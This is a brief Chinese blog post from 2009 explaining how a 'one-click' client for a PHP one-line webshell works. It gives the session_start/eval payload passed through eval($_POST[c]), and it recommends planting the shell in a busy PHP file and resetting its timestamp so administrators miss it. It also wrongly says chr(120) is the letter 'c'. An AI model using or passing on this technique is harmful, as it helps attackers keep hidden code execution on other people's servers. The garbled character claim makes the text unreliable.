2009-10
29
文/零魂
1.填好一句话WebShell地址和密码并点提交之后,后续操作不用再依赖客户端,基本上剩下的和操作大马没什么两样。
2.完全POST提交,避免了WebServer记录敏感数据。如果一句话插在有正常用户访问的PHP文件的话,插完时间也改回来了,那么管理员发现的概率就相当低了。(海洋的不是全POST)
大概原理:
一键提交版的一句话客户端连接成功之后,每次POST数据的时候, 假设一句话密码是c,都要先让本地表单:
c = session_start();eval($_SESSION[chr(120)]);
chr(120)就是字母c,为了避免单引号写成chr(120)形式。
然后一句话在eval($_POST[c])的时候,才能执行保存在Session中的我们的PHP代码。
想用其它密码的朋友可以依据这个原理修改。
还没有任何评论。